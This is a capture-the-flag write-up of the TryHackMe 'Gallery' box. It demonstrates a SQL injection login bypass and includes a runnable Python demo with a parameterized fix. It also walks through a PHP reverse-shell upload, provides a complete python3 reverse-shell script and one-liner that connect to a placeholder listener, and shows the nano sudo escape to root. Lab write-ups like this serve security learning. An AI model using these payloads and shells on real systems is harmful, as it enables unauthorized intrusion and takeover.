THM Gallery
Hello guys, Gallery is a nice beginner box that teaches SQL injection, authentication bypass, insecure file upload and finally privilege escalation. Without much more to say, let's jump in.
We start with a port scan and directory enumeration. This machine has only 2 open ports but a lot of directories.
As can be seen from the directory scan, there is nothing to do on port 80, but port 8080 has a bunch of directories and a login page.
Moving on to the login page, it shows the CMS "Simple Image Gallery System". A bit of research shows that its login page is vulnerable to SQL injection. Let's try the manual method first.
Using a basic injection on the username field, we manage to get in:
admin' or '1'='1'#
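To see why that payload works, here is an added illustration (my code, not the CMS's own): a string-concatenated login query of the kind behind this bypass, run against an in-memory SQLite table with constructed data, beside the parameterized version that defeats it. SQLite understands `-- ` but not MySQL's `#` as a comment marker, so the runnable form of the payload swaps the marker; the table, the admin password and the column names are made up for the demo.

```python
import sqlite3

# Constructed stand-in for the gallery's user table (example data, not the box's schema).
# Real apps should store a password hash; the bypass below does not depend on that.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users (username, password) VALUES ('admin', 'S3cretAdminPw!')")
    return conn

# The page's payload, as typed into the username field of a MySQL-backed login.
PAYLOAD_MYSQL = "admin' or '1'='1'#"
# Same trick with SQLite's comment syntax, so the demo can execute it locally.
PAYLOAD_SQLITE = "admin' or '1'='1'-- "

def build_query(username: str, password: str) -> str:
    """The vulnerable pattern: user input pasted straight into the SQL text.
    With PAYLOAD_MYSQL the closing quote is consumed by the payload and the
    comment marker discards the whole password check."""
    return (
        f"SELECT id, username FROM users WHERE username = '{username}' "
        f"AND password = '{password}'"
    )

def login_vulnerable(conn: sqlite3.Connection, username: str, password: str):
    """Returns the logged-in username, or None. Injectable."""
    row = conn.execute(build_query(username, password)).fetchone()
    return row[1] if row else None

def login_hardened(conn: sqlite3.Connection, username: str, password: str):
    """Same logic with bound parameters: the payload is compared as a literal
    username and never reaches the SQL parser, so no row matches."""
    row = conn.execute(
        "SELECT id, username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[1] if row else None

if __name__ == "__main__":
    db = make_db()
    print("query MySQL would see:", build_query(PAYLOAD_MYSQL, "anything"))
    print("vulnerable, wrong password:", login_vulnerable(db, "admin", "wrong"))
    print("vulnerable, payload:       ", login_vulnerable(db, PAYLOAD_SQLITE, "wrong"))
    print("hardened, payload:         ", login_hardened(db, PAYLOAD_SQLITE, "wrong"))
    print("hardened, real password:   ", login_hardened(db, "admin", "S3cretAdminPw!"))
```

The printed query shows the point of the `#`: everything after it, including `AND password = '...'`, is a comment to MySQL, so the `WHERE` clause reduces to `username = 'admin' OR '1'='1'` and the first row comes back. The parameterized query is the fix; input filtering on quotes is not.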
Searching for this CMS, it also appears to have unauthenticated RCE. Download the PoC and run it.
Either way, we manage to get access to the website as admin. The earlier directory scan found an uploads directory, so let's check it and try to put our reverse shell there.
Create new file
Upload testing file
The text file uploads successfully, which means we can upload a reverse shell here too. No sanitization of the file name or type happens on the server side, so this is an arbitrary file upload.
Listener
Go to the uploads directory and choose the last (newest) entry. Click the php file and we get the shell.
Following the link given, we manage to read the file. Let's put a reverse shell here. This time I'm using python3, so first confirm it exists on the target:
which python3
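The python3 reverse shell used at this step, written out as an added example (my code, not the author's). `LHOST` and `LPORT` are placeholders for your own listener (on TryHackMe, the VPN address that `nc -lvnp` is bound to); the function only connects when called, so importing or reading the file does nothing.

```python
import os
import pty
import shlex
import socket

# Assumed listener; replace with your attacking machine's address and port.
LHOST = "10.0.0.1"
LPORT = 4444

def reverse_shell(host: str, port: int) -> None:
    """Connect back to the listener and hand it an interactive bash.
    Only runs when called explicitly."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    # Point stdin, stdout and stderr of this process at the socket ...
    for fd in (0, 1, 2):
        os.dup2(s.fileno(), fd)
    # ... then spawn bash inside a pty, so sudo, su and nano get a real terminal.
    pty.spawn("/bin/bash")

def oneliner_code(host: str, port: int) -> str:
    """The same logic compressed into one statement for `python3 -c`."""
    return (
        "import os,pty,socket;"
        f"s=socket.socket();s.connect(('{host}',{port}));"
        "[os.dup2(s.fileno(),f) for f in (0,1,2)];"
        "pty.spawn('/bin/bash')"
    )

def oneliner(host: str, port: int) -> str:
    """Shell-quoted command line, safe to paste into the uploaded PHP shell's
    command parameter or any other place that runs a system command."""
    return f"python3 -c {shlex.quote(oneliner_code(host, port))}"

if __name__ == "__main__":
    # Print the command to run on the target; start `nc -lvnp 4444` first.
    print(oneliner(LHOST, LPORT))
```

Because the shell is spawned under a pty it already behaves like an interactive terminal; if you use a plainer `sh -i` payload instead, you will want the usual `python3 -c 'import pty;pty.spawn("/bin/bash")'` upgrade before running sudo or nano later on.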
Since we can't read the files inside mike's home folder, let's focus on credentials that might be lying around in the www directory.
Checking initialize.php, we find MySQL credentials. Let's connect to MySQL.
Unfortunately, this is just a rabbit hole. Let's proceed with linpeas.
After a few seconds, we notice a password in a history file; using those credentials we manage to log in as mike.
Step 6 - Privilege Escalation
From the linpeas result we notice a file in the /opt directory; checking the sudo permissions with sudo -l shows the same thing: we can run rootkit.sh as root, so that is our way to escalate.
Let's check what this bash script does and how we can exploit it.
From the script, one option lets us read report.txt in root's directory, and it does so by opening the file in nano. Any editor run as root can be turned into a root shell, so let's look nano up on GTFOBins and exploit it: in the nano opened by the script, press Ctrl+R then Ctrl+X and run reset; sh 1>&0 2>&0 to drop into a root shell.
We manage to get root. Easy, right? What do you think?
References
CMS Simple Image Gallery System
Nano escalation (GTFOBins)
Unintended pwnkit exploit (PwnKit, CVE-2021-4034)